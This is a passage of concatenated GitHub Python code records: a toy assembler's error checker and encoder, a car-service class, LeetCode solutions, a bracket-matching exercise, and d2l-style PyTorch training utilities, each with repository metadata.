range(len(ins_l)):\n if ins_l[i][0][-1]==\":\":\n continue\n if ins_l[i][0]=='mov':\n a=check_mov(ins_l[i][1:],linelist)\n if (a==-1):\n return -1,linelist[i]\n\n elif ins_l[i][0] in d1:\n l1.append(ins_l[i])\n\n elif ins_l[i][0] in d2:\n l2.append(ins_l[i])\n\n elif ins_l[i][0] in d3:\n l3.append(ins_l[i])\n\n # print(l1)\n # print(l2)\n # print(l3)\n \n\n\n for i in range(len(ins_l)):\n if ins_l[i] in l1:\n e1=reg_error_l1(ins_l[i])\n if(e1==-1):\n return -1,linelist[i]\n\n if ins_l[i] in l2:\n e2=reg_error_l2(ins_l[i])\n\n if (e2==-1):\n return -1,linelist[i]\n\n if ins_l[i] in l3:\n e3=reg_error_l3(ins_l[i])\n\n if (e3==-1):\n return -1,linelist[i]\n\n return 1,0\n # e1=reg_error_l1(l1)\n # e2=reg_error_l2(l2)\n # e3=reg_error_l3(l3)\n\n # if (e1 and e2 and e3):\n # return 1\n # else:\n # return -1\n \ndef ErrorCheck(lst,linelist): #ins_l\n varlist=[]\n labellist=[]\n z,y=is_valid_opcode(lst,linelist)\n if z==-1:\n return \"Line \"+y+\" Invalid instruction used\"\n z,y=error_len(lst,linelist)\n if z==-1:\n return \"Line \"+y+\" Invalid syntax\"\n z,y=syntax_error(lst,linelist)\n if z==-1:\n return \"Line \"+y+\" Invalid Syntax\"\n z,y=VarList(lst,varlist,linelist)\n if z==1:\n pass\n #print(varlist)\n else:\n return \"Line \"+y+\" Variables not defined at start\"\n z,y=Labellist(lst,labellist)\n if z==1:\n # print(labellist)\n pass\n else:\n return \"Line \"+y+\" Space between label and colon\"\n z,y=ImmediateError(lst,linelist)\n if z==0:\n return \"Line \"+y+\" $ does not preceed immediate value\"\n if z==-1:\n return \"Line \"+y+\" Immediate given out of range\"\n z,y=UndefinedVariables(lst,varlist,labellist,linelist)\n if z==-1:\n return \"Line \"+y+\" Undefined Variable\"\n if z==0:\n return \"Line \"+y+\" Misuse of label as variable\"\n z,y=UndefinedLabels(lst,varlist,labellist,linelist)\n if z==-1:\n return \"Line \"+y+\" Undefined Label\"\n if z==0:\n return \"Line \"+y+\" Misuse of variable as label\"\n z,y=haltError(lst,linelist)\n if z==-1:\n return 
\"Line \"+y+\" Halt used before last instruction\"\n if z==0:\n return \"Line \"+y+\" Halt not used to terminate program\"\n z,y=IllegalFlag(lst,linelist)\n if z==-1:\n return \"Line \"+y+\" Illegal usage of flag\"\n return \"No Errors\"\ndef input():\n with open(\"input.txt\",'r') as f:\n ins_l=[]\n linelist=[]\n ctr=1\n for i in f.readlines():\n split=i.split()\n if (split!=[]):\n if split[0][-1]==\":\":\n linelist.append(str(ctr))\n ins_l.append([split[0]])\n linelist.append(str(ctr))\n ins_l.append(split[1:])\n else:\n linelist.append(str(ctr))\n ins_l.append(split)\n ctr+=1\n \n #print(ins_l)\n #print(linelist)\n \n x = (ErrorCheck(ins_l,linelist))\n if x == \"No Errors\":\n return 1\n else:\n print (x)\n return 0\n\n\ndef add(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"add\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef sub(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"sub\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef mov(e1,e2,e3):\n ans = \"\"\n if e3:\n ans += dic_isa[\"mov1\"][\"opcode\"]\n ans += dic_r[e1]\n e2 = str(bin(int(e2[1:])))[2:]\n if (len(e2) != 8):\n for i in range (0,8-len(e2),1):\n ans += \"0\"\n ans += e2\n else:\n ans += dic_isa[\"mov2\"][\"opcode\"]\n ans += \"00000\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n return ans\ndef ld(e1,e2):\n ans = \"\"\n ans += dic_isa[\"ld\"][\"opcode\"]\n ans += dic_r[e1]\n r = variable[e2]\n if (len(r) != 8):\n for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef st(e1,e2):\n ans = \"\"\n ans += dic_isa[\"st\"][\"opcode\"]\n ans += dic_r[e1]\n r = variable[e2]\n if (len(r) != 8):\n for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef mul(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"mul\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef div(e1,e2):\n ans = \"\"\n ans += dic_isa[\"div\"][\"opcode\"]\n ans += \"00000\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n return ans\ndef rs(e1,e2):\n ans = \"\"\n ans += dic_isa[\"rs\"][\"opcode\"]\n ans += dic_r[e1]\n e2 = str(bin(int(e2[1:])))[2:]\n if (len(e2) != 8):\n for i in range (0,8-len(e2),1):\n ans += \"0\"\n ans += e2\n return ans\ndef ls(e1,e2):\n ans = \"\"\n ans += dic_isa[\"ls\"][\"opcode\"]\n ans += dic_r[e1]\n e2 = str(bin(int(e2[1:])))[2:]\n if (len(e2) != 8):\n for i in range (0,8-len(e2),1):\n ans += \"0\"\n ans += e2\n return ans\ndef xor(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"xor\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef or1(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"or\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef and1(e1,e2,e3):\n ans = \"\"\n ans += dic_isa[\"and\"][\"opcode\"]\n ans += \"00\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n ans += dic_r[e3]\n return ans\ndef not1(e1,e2):\n ans = \"\"\n ans += dic_isa[\"not\"][\"opcode\"]\n ans += \"00000\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n return ans\ndef cmp(e1,e2):\n ans = \"\"\n ans += dic_isa[\"cmp\"][\"opcode\"]\n ans += \"00000\"\n ans += dic_r[e1]\n ans += dic_r[e2]\n return ans\ndef jmp(e1):\n ans = \"\"\n ans += dic_isa[\"jmp\"][\"opcode\"]\n ans += \"000\"\n r = labels[e1]\n if (len(r) != 8):\n for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef jlt(e1):\n ans = \"\"\n ans += dic_isa[\"jlt\"][\"opcode\"]\n ans += \"000\"\n r = labels[e1]\n if (len(r) != 8):\n 
for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef jgt(e1):\n ans = \"\"\n ans += dic_isa[\"jgt\"][\"opcode\"]\n ans += \"000\"\n r = labels[e1]\n if (len(r) != 8):\n for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef je(e1):\n # print(e1)\n ans = \"\"\n ans += dic_isa[\"je\"][\"opcode\"]\n ans += \"000\"\n r = labels[e1]\n if (len(r) != 8):\n for i in range (0,8-len(r),1):\n ans += \"0\"\n ans += r\n return ans\ndef hlt():\n ans = \"\"\n ans += dic_isa[\"hlt\"][\"opcode\"]\n ans += \"00000000000\"\n return ans\n\ny = input()\nif y :\n dic_r = {\"R0\" : \"000\",\"R1\" : \"001\", \"R2\" : \"010\" , \"R3\" : \"011\" , \"R4\" : \"100\" , \"R5\" : \"101\" , \"R6\" :\"110\", \"FLAGS\" : \"111\"}\n dic_isa = {\n \"add\" : {\"opcode\" : \"10000\", \"type\" : \"a\"},\n \"sub\" : {\"opcode\" : \"10001\", \"type\" : \"a\"},\n \"mov1\" : {\"opcode\" : \"10010\", \"type\" : \"b\"},\n \"mov2\" : {\"opcode\" : \"10011\", \"type\" : \"c\"},\n \"ld\" : {\"opcode\" : \"10100\", \"type\" : \"d\"},\n \"st\" : {\"opcode\" : \"10101\", \"type\" : \"d\"},\n \"mul\" : {\"opcode\" : \"10110\", \"type\" : \"a\"},\n \"div\" : {\"opcode\" : \"10111\", \"type\" : \"c\"},\n \"rs\" : {\"opcode\" : \"11000\", \"type\" : \"b\"},\n \"ls\" : {\"opcode\" : \"11001\", \"type\" : \"b\"},\n \"xor\" : {\"opcode\" : \"11010\", \"type\" : \"a\"},\n \"or\" : {\"opcode\" : \"11011\", \"type\" : \"a\"},\n \"and\" : {\"opcode\" : \"11100\", \"type\" : \"a\"},\n \"not\" : {\"opcode\" : \"11101\", \"type\" : \"c\"},\n \"cmp\" : {\"opcode\" : \"11110\", \"type\" : \"c\"},\n \"jmp\" : {\"opcode\" : \"11111\", \"type\" : \"e\"},\n \"jlt\" : {\"opcode\" : \"01100\", \"type\" : \"e\"},\n \"jgt\" : {\"opcode\" : \"01101\", \"type\" : \"e\"},\n \"je\" : {\"opcode\" : \"01111\", \"type\" : \"e\"},\n \"hlt\" : {\"opcode\" : \"01010\", \"type\" : \"f\"},\n }\n memory= []\n for i in range(0,256,1) :\n x = str(bin(i))[2:]\n memory.append(x)\n with open(\"input.txt\",\"r\") as f:\n l = [ x for x in f.read().split(\"\\n\")]\n #print(l)\n labels = {}\n variable = {}\n counter = -1\n f = open(\"Output.txt\",\"w\")\n for i in l:\n counter += 1\n if i == \"\":\n pass\n else:\n m = [x for x in i.split()]\n #print(m)\n if m[0] == \"var\" :\n variable[m[1]] = memory[counter] \n if m[0][-1] == \":\" :\n # print(m)\n labels[m[0][0:-1]] = memory[counter]\n # print(m[0][0:-1])\n for i in l:\n if i == \"\":\n pass\n else:\n m = [x for x in i.split()]\n if m[0] == \"var\":\n pass\n if m[0][-1] == \":\" :\n m = m[1:]\n if m[0] == \"add\":\n ans = add(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"sub\":\n ans = sub(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"mov\":\n t = False\n if m[2][0] == \"$\":\n t = True\n ans = mov(m[1],m[2],t)\n f.write(ans + \"\\n\")\n elif m[0] == \"ld\":\n ans = ld(m[1],m[2])\n f.write(ans + \"\\n\")\n elif m[0] == \"st\":\n ans = st(m[1],m[2])\n #f.write(\"f\")\n f.write(ans + \"\\n\")\n elif m[0] == \"mul\":\n ans = mul(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"div\":\n ans = div(m[1],m[2])\n f.write(ans + \"\\n\")\n elif m[0] == \"rs\":\n ans = rs(m[1],m[2])\n f.write(ans + \"\\n\")\n elif m[0] == \"ls\":\n ans = ls(m[1],m[2])\n f.write(ans + \"\\n\")\n elif m[0] == \"xor\":\n ans = xor(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"or\":\n ans = or1(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"and\":\n ans = and1(m[1],m[2],m[3])\n f.write(ans + \"\\n\")\n elif m[0] == \"not\":\n ans = not1(m[1],m[2])\n f.write(ans + 
\"\\n\")\n elif m[0] == \"cmp\":\n ans = cmp(m[1],m[2])\n f.write(ans + \"\\n\")\n elif m[0] == \"jmp\":\n ans = jmp(m[1])\n f.write(ans + \"\\n\")\n elif m[0] == \"jlt\":\n ans = jlt(m[1])\n f.write(ans + \"\\n\")\n elif m[0] == \"jgt\":\n ans = jgt(m[1])\n f.write(ans + \"\\n\")\n elif m[0] == \"je\":\n # print (labels.keys())\n ans = je(m[1])\n f.write(ans + \"\\n\")\n elif m[0] == \"hlt\":\n ans = hlt()\n f.write(ans + \"\\n\")\n f.close() #hello\n","repo_name":"ArnAg26/CO-Project","sub_path":"xtra/qs1.py","file_name":"qs1.py","file_ext":"py","file_size_in_byte":16078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26805734914","text":"from domain.car import Car\nfrom repository.car_repository import CarInMemoryRepository\n\n\nclass CarService:\n \"\"\"\n Manages car logic.\n \"\"\"\n\n def __init__(self, car_repository , repository, validator):\n \"\"\"\n Creates a car service.\n \"\"\"\n self.__validator = validator\n self.__repository = repository\n self.__car_repository = car_repository\n\n\n def add_car(self, id_car,model,an_cumparare , nr_km, garantie,an_fabricatie ):\n \"\"\"\n Creates a car\n :param id_car: int, the card id.\n :param indicator: int, the indicator.\n :param comfort_level: str, one of 'standard', 'high', 'premium'\n :param card_payment: bool\n :param model: str, the model\n \"\"\"\n if garantie =='da':\n garantie = True\n else:\n garantie = False\n car = Car(id_car, model, an_cumparare, nr_km, garantie, an_fabricatie)\n self.__car_repository.create(car)\n\n\n\n def remove_car(self, id_car):\n car_to_delete = self.__car_repository.read(id_car)\n if car_to_delete is not None:\n self.__car_repository.delete(id_car)\n\n\n def update_car(self, id_car,model, an_cumparare, nr_km, garantie, an_fabricatie):\n car_to_update=self.__repository.read(id_car)\n if car_to_update is not None:\n car = Car(id_car, model, an_cumparare, nr_km, garantie,an_fabricatie)\n self.__car_repository.update(car)\n\n def get_all(self):\n \"\"\"\n :return: a list of all the cars.\n \"\"\"\n return self.__car_repository.read()\n\n\n\n def garantie(self ):\n import datetime\n for car in self.__car_repository.read():\n car=self.__car_repository.read(car.id_entity)\n nr_km=car.nr_km\n an_cumparare=car.an_cumparare\n id_car=car.id_entity\n model=car.model\n an_fabricatie=car.an_fabricatie\n garantie=car.garantie\n x = datetime.datetime(2016, 12, 12)\n if nr_km<60000 and an_cumparare> x :\n garantie= 'da'\n else:\n garantie= 'nu'\n car = Car(id_car, model, an_cumparare, nr_km, garantie, an_fabricatie)\n self.__car_repository.update(car)\n\n def cautare(self, x, y, z):\n for car in self.__car_repository.read():\n car=self.__car_repository.read(car.id_entity)\n model=car.model\n an_cumparare=car.an_cumparare\n nr_km=car.nr_km\n an_fabricatie=car.an_fabricatie\n if x==model:\n print(model)\n if y==nr_km:\n print(nr_km)\n if z==an_fabricatie:\n print(an_fabricatie)\n","repo_name":"rollstar615/service_AUTO","sub_path":"service/car_service.py","file_name":"car_service.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27415235291","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\nimport queue\n\n\nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: Node\n :rtype: List[List[int]]\n \"\"\"\n if root is None:\n return 
[]\n\n res = []\n stack = queue.Queue()\n stack.put(root)\n\n while stack.empty() is not True:\n cur_nums = stack.qsize()\n temp = []\n for i in range(cur_nums):\n cur_node = stack.get()\n temp.append(cur_node.val)\n for node in cur_node.children:\n stack.put(node)\n res.append(temp)\n\n return res\n","repo_name":"Janeho454199/my_leetcode","sub_path":"tree/429-N叉树的层序遍历.py","file_name":"429-N叉树的层序遍历.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27329389145","text":"class Solution(object):\n def romanToInt(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n map = {\"M\":1000,\"D\": 500, \"C\": 100, \"L\": 50, \"X\": 10, \"V\": 5, \"I\": 1}\n res = 0\n for i in range(len(s)):\n if map[s[i]]>map[s[i-1]] and i>0:\n res -= map[s[i-1]]*2\n res += map[s[i]]\n return res\n","repo_name":"PrinceNathaniel/leetcode","sub_path":"013Roman2integer.py","file_name":"013Roman2integer.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26060118028","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\nfor tc in range(1, T+1):\n bracket = input()\n # print(bracket)\n\n stack = []\n result = 1\n for i in bracket:\n if i == '(':\n stack.append(i)\n else:\n if stack:\n stack.pop()\n else:\n result = -1\n break\n else:\n if stack:\n result = -1\n print(result)\n","repo_name":"SWan9710/algorithm","sub_path":"algorithm/06_Stack_I/bracket/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70971444249","text":"from matplotlib import pyplot as plt\nimport torch\nimport torch.utils.data as tdata\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchtext.vocab as Vocab\nimport random\nimport time\nimport zipfile\nimport math\nimport os\nimport collections\n\nimport d2lzh_pytorch as d2l\n\ndef show_scatter(x, y, timeParsed=5):\n plt.scatter(x, y, 1)\n plt.show(block=False)\n plt.pause(timeParsed)\n plt.close()\n\n## Return several (batch_size) features and labels every time.\ndef data_iter(batch_size, features, labels):\n num_examples = len(features)\n indices = list(range(num_examples))\n random.shuffle(indices) ## Randomly read data.\n for i in range(0, num_examples, batch_size):\n j = torch.LongTensor(indices[i: min(i + batch_size, num_examples)])\n yield features.index_select(0, j), labels.index_select(0, j)\n\n## Linear regression expression.\ndef linreg(X, w, b):\n return torch.mm(X, w) + b\n\n## Loss function of linear regression. 
(a - b) ^ 2 / 2\ndef squared_loss(y_hat, y):\n return (y_hat - y.view(y_hat.size()) ) ** 2 / 2\n\n## Stochastic Gradient Descent in small batches.\ndef sgd(params, lr, batch_size):\n for param in params:\n ## Use [param.data] to change param\n if param.grad is not None:\n param.data -= lr * param.grad / batch_size \n\ndef get_fashion_mnist_labels(labels):\n text_labels = ['t-shirt', 'trouser', 'pullover', 'dress', 'coat',\n 'sandal', 'shirt', 'sneaker', 'bag', 'ankle boot']\n return [text_labels[int(i)] for i in labels]\n\ndef show_fashion_mnist(images, labels, timeParsed=5):\n # 这里的_表示我们忽略(不使用)的变量\n _, figs = plt.subplots(1, len(images), figsize=(12, 12))\n for f, img, lbl in zip(figs, images, labels):\n f.imshow(img.view((28, 28)).numpy())\n f.set_title(lbl)\n f.axes.get_xaxis().set_visible(False)\n f.axes.get_yaxis().set_visible(False)\n plt.show(block=False)\n plt.pause(timeParsed)\n plt.close()\n\n## return: train_iter, test_iter\n## Use: for feature, label in train_iter..\ndef load_data_fashion_mnist(batch_size=256, num_workers=4):\n mnist_train = torchvision.datasets.FashionMNIST(\n root='~/StudyNote/PyTorch/Datasets/FashionMNIST', train=True, \n download=True, transform=transforms.ToTensor())\n mnist_test = torchvision.datasets.FashionMNIST(\n root='~/StudyNote/PyTorch/Datasets/FashionMNIST', train=False, \n download=True, transform=transforms.ToTensor())\n train_iter = tdata.DataLoader(mnist_train, batch_size=batch_size, \n shuffle=True, num_workers=num_workers)\n test_iter = tdata.DataLoader(mnist_test, batch_size=batch_size, \n shuffle=False, num_workers=num_workers)\n return train_iter, test_iter\n\n# device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\ndevice = torch.device(torch.device('cpu'))\n\n# def evaluate_accuracy(data_iter, net):\n# acc_sum, n = 0.0, 0\n# for X, y in data_iter:\n# X = X.to(device=device)\n# y = y.to(device=device)\n# acc_sum += (net(X).argmax(dim=1) == y).float().sum().item()\n# n += y.shape[0]\n# return acc_sum / n\n\ndef evaluate_accuracy(data_iter, net, device=None):\n if device is None and isinstance(net, torch.nn.Module):\n # 如果没指定device就使用net的device\n device = list(net.parameters())[0].device \n acc_sum, n = 0.0, 0\n with torch.no_grad():\n for X, y in data_iter:\n net.eval() # 评估模式, 这会关闭dropout\n acc_sum += (net(X.to(device)).argmax(dim=1) == y.to(device)).float().sum().cpu().item()\n net.train() # 改回训练模式\n n += y.shape[0]\n return acc_sum / n\n\ndef train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size,\n params=None, lr=None, optimizer=None):\n for epoch in range(num_epochs):\n startTime = time.time() \n train_l_sum, train_acc_sum, n = 0.0, 0.0, 0\n for X, y in train_iter:\n X = X.to(device=device)\n y = y.to(device=device)\n y_hat = net(X)\n l = loss(y_hat, y).sum()\n\n # 梯度清零\n if optimizer is not None:\n optimizer.zero_grad()\n elif params is not None and params[0].grad is not None:\n for param in params:\n if param.grad is not None:\n param.grad.data.zero_()\n\n l.backward()\n if optimizer is None:\n d2l.sgd(params, lr, batch_size)\n else:\n optimizer.step() # “softmax回归的简洁实现”一节将用到\n\n\n train_l_sum += l.item()\n train_acc_sum += (y_hat.argmax(dim=1) == y).sum().item()\n n += y.shape[0]\n test_acc = evaluate_accuracy(test_iter, net)\n duration = time.time() - startTime\n print('epoch %d, loss %.4f, train acc %.3f, test acc %.3f, time %.3f sec'\n % (epoch + 1, train_l_sum / n, train_acc_sum / n, test_acc, duration))\n\nclass FlattenLayer(torch.nn.Module):\n def __init__(self):\n super(FlattenLayer, 
self).__init__()\n def forward(self, x): # x shape: (batch, *, *, ...)\n return x.view(x.shape[0], -1)\n\ndef semilogy(x_vals, y_vals, x_label, y_label, x2_vals=None, y2_vals=None,\n legend=None, figsize=(3.5, 2.5), timeParsed=10):\n # d2l.set_figsize(figsize)\n d2l.plt.xlabel(x_label)\n d2l.plt.ylabel(y_label)\n d2l.plt.semilogy(x_vals, y_vals)\n if x2_vals and y2_vals:\n d2l.plt.semilogy(x2_vals, y2_vals, linestyle=':')\n d2l.plt.legend(legend)\n plt.show(block=False)\n plt.pause(timeParsed)\n plt.close()\n\n## Get 2 small batches from data set randomly.\ndef data_iter_random(corpus_indices, batch_size, num_steps, device=None):\n # 减1是因为输出的索引x是相应输入的索引y加1\n num_examples = (len(corpus_indices) - 1) // num_steps\n epoch_size = num_examples // batch_size\n example_indices = list(range(num_examples))\n random.shuffle(example_indices)\n\n # 返回从pos开始的长为num_steps的序列\n def _data(pos):\n return corpus_indices[pos: pos + num_steps]\n if device is None:\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n for i in range(epoch_size):\n # 每次读取batch_size个随机样本\n i = i * batch_size\n batch_indices = example_indices[i: i + batch_size]\n X = [_data(j * num_steps) for j in batch_indices]\n Y = [_data(j * num_steps + 1) for j in batch_indices]\n yield torch.tensor(X, dtype=torch.float32, device=device), torch.tensor(Y, dtype=torch.float32, device=device)\n\n## Get 2 small batches from data set consequently.\ndef data_iter_consecutive(corpus_indices, batch_size, num_steps, device=None):\n if device is None:\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n corpus_indices = torch.tensor(corpus_indices, dtype=torch.float32, device=device)\n data_len = len(corpus_indices)\n batch_len = data_len // batch_size\n indices = corpus_indices[0: batch_size*batch_len].view(batch_size, batch_len)\n epoch_size = (batch_len - 1) // num_steps\n for i in range(epoch_size):\n i = i * num_steps\n X = indices[:, i: i + num_steps]\n Y = indices[:, i + 1: i + num_steps + 1]\n yield X, Y\n\ndef load_data_jay_lyrics():\n ## Read chars.\n with zipfile.ZipFile('Datasets/jaychou_lyrics.txt.zip') as zin:\n with zin.open('jaychou_lyrics.txt') as f:\n corpus_chars = f.read().decode('utf-8')\n corpus_chars = corpus_chars.replace('\\n', ' ').replace('\\r', ' ')\n corpus_chars = corpus_chars[0:10000] # Use only 10k chars to train.\n\n ## Such as ['A', 'B', 'C' ..]\n idx_to_char = list(set(corpus_chars)) \n ## Such as {'A': 1, 'B': 2, 'C': 3 ..}\n char_to_idx = dict([(char, i) for i, char in enumerate(idx_to_char)])\n vocab_size = len(char_to_idx)\n corpus_indices = [char_to_idx[char] for char in corpus_chars] \n return corpus_indices, char_to_idx, idx_to_char, vocab_size\n\ndef one_hot(x, n_class, dtype=torch.float32): \n # X shape: (batch), output shape: (batch, n_class)\n x = x.long()\n res = torch.zeros(x.shape[0], n_class, dtype=dtype, device=x.device)\n res.scatter_(1, x.view(-1, 1), 1)\n return res\n\ndef to_onehot(X, n_class): \n # X shape: (batch, seq_len), output: seq_len elements of (batch, n_class)\n return [one_hot(X[:, i], n_class) for i in range(X.shape[1])]\n\n## Get predict string by prefix string\ndef predict_rnn(prefix, num_chars, rnn, params, init_rnn_state,\n num_hiddens, vocab_size, device, idx_to_char, char_to_idx):\n state = init_rnn_state(1, num_hiddens, device)\n output = [char_to_idx[prefix[0]]]\n for t in range(num_chars + len(prefix) - 1):\n # 将上一时间步的输出作为当前时间步的输入\n # X = F.one_hot(torch.tensor([[output[-1]]], device=device), vocab_size).float()\n X = 
to_onehot(torch.tensor([[output[-1]]], device=device), vocab_size)\n # 计算输出和更新隐藏状态\n (Y, state) = rnn(X, state, params)\n # 下一个时间步的输入是prefix里的字符或者当前的最佳预测字符\n if t < len(prefix) - 1:\n output.append(char_to_idx[prefix[t + 1]])\n else:\n output.append(int(Y[0].argmax(dim=1).item()))\n return ''.join([idx_to_char[i] for i in output])\n\ndef train_and_predict_rnn(rnn, get_params, init_rnn_state, num_hiddens,\n vocab_size, device, corpus_indices, idx_to_char,\n char_to_idx, is_random_iter, num_epochs, num_steps,\n lr, clipping_theta, batch_size, pred_period,\n pred_len, prefixes):\n if is_random_iter:\n data_iter_fn = d2l.data_iter_random\n else:\n data_iter_fn = d2l.data_iter_consecutive\n params = get_params()\n loss = nn.CrossEntropyLoss()\n\n for epoch in range(num_epochs):\n if not is_random_iter: # 如使用相邻采样,在epoch开始时初始化隐藏状态\n state = init_rnn_state(batch_size, num_hiddens, device)\n l_sum, n, start = 0.0, 0, time.time()\n data_iter = data_iter_fn(corpus_indices, batch_size, num_steps, device)\n for X, Y in data_iter:\n if is_random_iter: # 如使用随机采样,在每个小批量更新前初始化隐藏状态\n state = init_rnn_state(batch_size, num_hiddens, device)\n else: \n # 否则需要使用detach函数从计算图分离隐藏状态, 这是为了\n # 使模型参数的梯度计算只依赖一次迭代读取的小批量序列(防止梯度计算开销太大)\n for s in state:\n s.detach_()\n\n # inputs = F.one_hot(X, num_classes=vocab_size)\n inputs = to_onehot(X, vocab_size)\n # outputs有num_steps个形状为(batch_size, vocab_size)的矩阵\n (outputs, state) = rnn(inputs, state, params)\n # 拼接之后形状为(num_steps * batch_size, vocab_size)\n outputs = torch.cat(outputs, dim=0)\n # Y的形状是(batch_size, num_steps),转置后再变成长度为\n # batch * num_steps 的向量,这样跟输出的行一一对应\n y = torch.transpose(Y, 0, 1).contiguous().view(-1)\n # 使用交叉熵损失计算平均分类误差\n l = loss(outputs, y.long())\n\n # 梯度清0\n if params[0].grad is not None:\n for param in params:\n param.grad.data.zero_()\n l.backward()\n grad_clipping(params, clipping_theta, device) # 裁剪梯度\n d2l.sgd(params, lr, 1) # 因为误差已经取过均值,梯度不用再做平均\n l_sum += l.item() * y.shape[0]\n n += y.shape[0]\n\n if (epoch + 1) % pred_period == 0:\n print('epoch %d, perplexity %f, time %.2f sec' % (\n epoch + 1, math.exp(l_sum / n), time.time() - start))\n for prefix in prefixes:\n print(' -', predict_rnn(prefix, pred_len, rnn, params, init_rnn_state,\n num_hiddens, vocab_size, device, idx_to_char, char_to_idx))\n\n## Make ||g|| < theta.\ndef grad_clipping(params, theta, device):\n norm = torch.tensor([0.0], device=device)\n for param in params:\n norm += (param.grad.data ** 2).sum()\n norm = norm.sqrt().item()\n if norm > theta:\n for param in params:\n param.grad.data *= (theta / norm)\n\nclass RNNModel(nn.Module):\n def __init__(self, rnn_layer, vocab_size):\n super(RNNModel, self).__init__()\n self.rnn = rnn_layer\n self.hidden_size = rnn_layer.hidden_size * (\n 2 if rnn_layer.bidirectional else 1)\n self.vocab_size = vocab_size\n self.dense = nn.Linear(self.hidden_size, vocab_size)\n self.state = None\n \n def forward(self, inputs, state):\n X = to_onehot(inputs, self.vocab_size)\n ## Y.shape is (num_steps * batch_size, num_hiddens)\n Y, self.state = self.rnn(torch.stack(X), state)\n ## output.shape is (num_steps * batch_size, vocab_size)\n output = self.dense(Y.view(-1, Y.shape[-1]))\n return output, self.state\n\ndef predict_rnn_pytorch(prefix, num_chars, model, vocab_size, device, idx_to_char,\n char_to_idx):\n state = None\n output = [char_to_idx[prefix[0]]] # output会记录prefix加上输出\n for t in range(num_chars + len(prefix) - 1):\n X = torch.tensor([output[-1]], device=device).view(1, 1)\n if state is not None:\n if isinstance(state, tuple): # LSTM, 
state:(h, c) \n state = (state[0].to(device), state[1].to(device))\n else: \n state = state.to(device)\n\n (Y, state) = model(X, state)\n if t < len(prefix) - 1:\n output.append(char_to_idx[prefix[t + 1]])\n else:\n output.append(int(Y.argmax(dim=1).item()))\n return ''.join([idx_to_char[i] for i in output])\n\ndef train_and_predict_rnn_pytorch(model, num_hiddens, vocab_size, device,\n corpus_indices, idx_to_char, char_to_idx,\n num_epochs, num_steps, lr, clipping_theta,\n batch_size, pred_period, pred_len, prefixes):\n loss = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n model.to(device)\n state = None\n for epoch in range(num_epochs):\n l_sum, n, start = 0.0, 0, time.time()\n data_iter = d2l.data_iter_consecutive(corpus_indices, batch_size, num_steps, device) # 相邻采样\n for X, Y in data_iter:\n if state is not None:\n # 使用detach函数从计算图分离隐藏状态, 这是为了\n # 使模型参数的梯度计算只依赖一次迭代读取的小批量序列(防止梯度计算开销太大)\n if isinstance (state, tuple): # LSTM, state:(h, c) \n state = (state[0].detach(), state[1].detach())\n else: \n state = state.detach()\n\n (output, state) = model(X, state) # output: 形状为(num_steps * batch_size, vocab_size)\n\n # Y的形状是(batch_size, num_steps),转置后再变成长度为\n # batch * num_steps 的向量,这样跟输出的行一一对应\n y = torch.transpose(Y, 0, 1).contiguous().view(-1)\n l = loss(output, y.long())\n\n optimizer.zero_grad()\n l.backward()\n # 梯度裁剪\n d2l.grad_clipping(model.parameters(), clipping_theta, device)\n optimizer.step()\n l_sum += l.item() * y.shape[0]\n n += y.shape[0]\n\n try:\n perplexity = math.exp(l_sum / n)\n except OverflowError:\n perplexity = float('inf')\n if (epoch + 